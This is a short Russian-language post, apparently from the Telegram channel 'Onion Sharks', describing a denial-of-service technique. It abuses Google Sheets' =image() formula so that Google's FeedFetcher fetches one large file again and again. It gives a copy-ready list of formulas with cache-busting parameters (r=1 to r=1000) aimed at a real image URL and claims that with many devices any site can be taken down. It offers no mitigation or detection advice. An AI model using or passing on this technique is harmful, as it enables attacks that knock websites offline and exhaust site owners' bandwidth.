DDOS атака с помощью Google Таблицы
Onion Sharks 🦈Google используется инструмент FeedFetcher для кэширования контента в Google Таблицы, вставленного через формулу:
=image("URL изображения")
Допустим, если в ячейку таблицы вставить данную формулу, то Google отправит FeedFetcher скачивать данное изображение и кэшировать его для дальнейшего изображения. Но если добавить случайный параметр к URL изображения, FeedFetcher будет повторно скачивать данное изображение.
Пример:
=image("https://i.ytimg.com/vi/QdapEXoPDqg/maxresdefault.jpg?r=1") =image("https://i.ytimg.com/vi/QdapEXoPDqg/maxresdefault.jpg?r=2") =image("https://i.ytimg.com/vi/QdapEXoPDqg/maxresdefault.jpg?r=3") =image("https://i.ytimg.com/vi/QdapEXoPDqg/maxresdefault.jpg?r=4") =image("https://i.ytimg.com/vi/QdapEXoPDqg/maxresdefault.jpg?r=5") =image("https://i.ytimg.com/vi/QdapEXoPDqg/maxresdefault.jpg?r=6") =image("https://i.ytimg.com/vi/QdapEXoPDqg/maxresdefault.jpg?r=7") =image("https://i.ytimg.com/vi/QdapEXoPDqg/maxresdefault.jpg?r=8") =image("https://i.ytimg.com/vi/QdapEXoPDqg/maxresdefault.jpg?r=9") ... =image("https://i.ytimg.com/vi/QdapEXoPDqg/maxresdefault.jpg?r=1000")
Допустим, наше изображение весит 5 МБ. FeedFetcher с помощью такой вставки скачает одно и то же изображение 1000 раз, что может привести к исчерпанию лимита трафика.
Используя большое количество устройств можно положить любой сайт. Сам же инструмент FeedFetcher для скачивания изображения использует несколько IP-адресов, но User-Agent все один и тот же.
Забавно, что абсолютно любой человек с помощью одного только сервиса Google Таблицы доставить столько проблем. К слову, данный метод существует еще с 2012 года.
Весь материал принадлежит телеграмм каналу Onion Sharks 🦈